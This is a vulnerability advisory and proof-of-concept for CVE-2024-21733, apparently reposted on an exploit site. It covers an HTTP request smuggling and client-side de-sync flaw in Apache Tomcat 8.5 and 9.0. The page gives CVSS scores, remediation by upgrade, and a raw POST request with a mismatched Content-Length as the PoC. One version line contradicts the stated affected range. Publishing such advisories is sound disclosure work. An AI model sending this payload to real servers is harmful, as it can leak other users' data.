Apache Tomcat 8.5.63 / 9.0.43 HTTP Response Smuggling Vulnerability

2024-02-0100:00:00

xer0dayz

0day.today

185

apache tomcat 8.5

apache tomcat 9.0

http response smuggling

vulnerability

cve-2024-21733

client-side de-sync

upgrade

security advisory

xer0dayz

sn1persecurity llc

proton mail

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.6 Medium

AI Score

Confidence

High

0.007 Low

EPSS

Percentile

80.3%

JSON

Apache Tomcat suffers from a client-side de-sync vulnerability via HTTP request smuggling. Apache Tomcat versions 8.5.7 through 8.5.63 and 9.0.0-M11 through 9.0.43 are vulnerable.

# Exploit Title: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling
# Date: 1/31/2024
# Exploit Author: xer0dayz
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/
# Version: 8.5.7 to 8.5.63 or 9.0.44 or later
# CVE : CVE-2024-21733

## Description:
Apache Tomcat from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43 are vulnerable to client-side de-sync attacks.

Client-side de-sync (CSD) vulnerabilities occur when a web server fails to correctly process the Content-Length of POST requests. By exploiting this behavior, an attacker can force a victim's browser to de-synchronize its connection with the website, causing sensitive data to be smuggled from the server and/or client connections.

## Remediation:
Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.

## Credit:
This vulnerability was reported responsibly to the Tomcat security team by xer0dayz from Sn1perSecurity LLC.

## History:
2024-01-19 Original advisory

## Full Security Advisory: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz

## Full Write-Up: https://sn1persecurity.com/wordpress/cve-2024-21733-apache-tomcat-http-request-smuggling/

## PoC/Exploit:

POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
X

Sent with [Proton Mail](https://proton.me/) secure email.